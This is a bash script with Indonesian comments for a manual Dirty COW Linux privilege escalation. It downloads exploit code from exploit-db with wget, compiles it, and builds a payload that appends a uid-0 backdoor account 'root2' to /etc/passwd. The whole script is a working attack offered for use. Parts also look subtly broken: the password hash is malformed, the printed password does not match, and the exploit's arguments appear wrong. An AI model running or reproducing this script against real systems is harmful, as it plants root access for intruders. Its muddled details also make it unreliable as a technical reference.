#!/bin/bash
# dirtycow_manual.sh

echo "[*] Memulai eksploitasi Dirty Cow manual..."

# Buat direktori kerja
mkdir -p /tmp/cow_exploit
cd /tmp/cow_exploit

# Download exploit
echo "[*] Download exploit..."
wget -q https://www.exploit-db.com/download/40839 -O dirty.c

# Kompilasi exploit
echo "[*] Kompilasi exploit..."
gcc -pthread dirty.c -o dirty -lcrypt

# Buat payload untuk menambah user root
cat > payload.c << 'EOF'
#include <stdio.h>
#include <stdlib.h>

int main() {
    FILE *fp = fopen("/etc/passwd", "a");
    if (fp == NULL) return 1;
    fprintf(fp, "root2:$1$root2$X8m2e5f7$9X8Z7w6Y5v4u3i2o1p0:0:0:root:/root:/bin/bash\n");
    fclose(fp);
    return 0;
}
EOF

# Kompilasi payload
echo "[*] Kompilasi payload..."
gcc payload.c -o payload

# Jalankan exploit
echo "[*] Menjalankan exploit (tunggu beberapa detik)..."
./dirty /etc/passwd payload

# Tunggu dan verifikasi
sleep 3
echo "[*] Memverifikasi..."
if grep -q "root2" /etc/passwd; then
    echo "[+] Exploit berhasil!"
    echo "[+] Login dengan: su - root2"
    echo "[+] Password: password"
else
    echo "[-] Exploit gagal"
fi